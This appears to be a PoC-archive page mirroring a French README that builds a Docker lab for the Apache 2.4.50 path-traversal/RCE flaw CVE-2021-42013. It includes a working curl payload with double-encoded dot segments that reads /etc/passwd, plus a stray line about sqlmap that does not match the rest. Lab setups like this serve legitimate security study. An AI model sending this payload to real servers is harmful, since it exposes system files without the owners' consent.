关联漏洞
标题:Apache HTTP Server 安全漏洞 (CVE-2021-42013)Description:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别
Description
CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Path Traversal or Remote Code Execution vulnerabilities in Apache 2.4.49 and 2.4.50
介绍
# Dockerisation d'une Vulnérabilité : cve-2021-42013
Ce projet vise à dockeriser une vulnérabilité spécifique en utilisant Docker. L'objectif est de créer un environnement isolé dans lequel la vulnérabilité peut être exploitée et testée de manière sécurisée.
## Application vulnérable
Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal
## Installation
Pour exécuter ce projet, vous devez avoir sur votre machine :
- [Docker](https://www.docker.com/)
- [Python](https://www.python.org/)
- [Curl](https://curl.se/)
Une fois les prérequis installé, vous pouvez cloner ce dépôt Git sur votre machine :
```bash
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
```
Une fois dans le répertoire, exécuter la commande si dessous pour mettre en place l'environement vulnérable:
```bash
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
```
Accéder ensuite à l'application à l'adresse http://localhost:8000
Si tout va bien, vous devez voir s'afficher "It works"
## Exploitation de la vulnérabilité
L'exécution de ce payload avec `curl` ci dessous nous montre que la cible est vulnérable. Le script générera la commande sqlmap appropriée pour exploiter la vulnérabilité
```bash
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
```
Ce payload peut accéder directement aux informations relatives à l'utilisateur dans le système sans le consentement de l'utilisateur.
Une fois que nous aurons activé les mods cgi ou cgid sur le serveur, cette vulnérabilité permettra à un attaquant d'exécuter des commandes arbitraires
文件快照
[4.0K] /data/pocs/08af1ad42ce8463df941dbbe95d004277a2c79eb
├── [ 422] Dockerfile
├── [ 18K] httpd.conf
└── [1.7K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →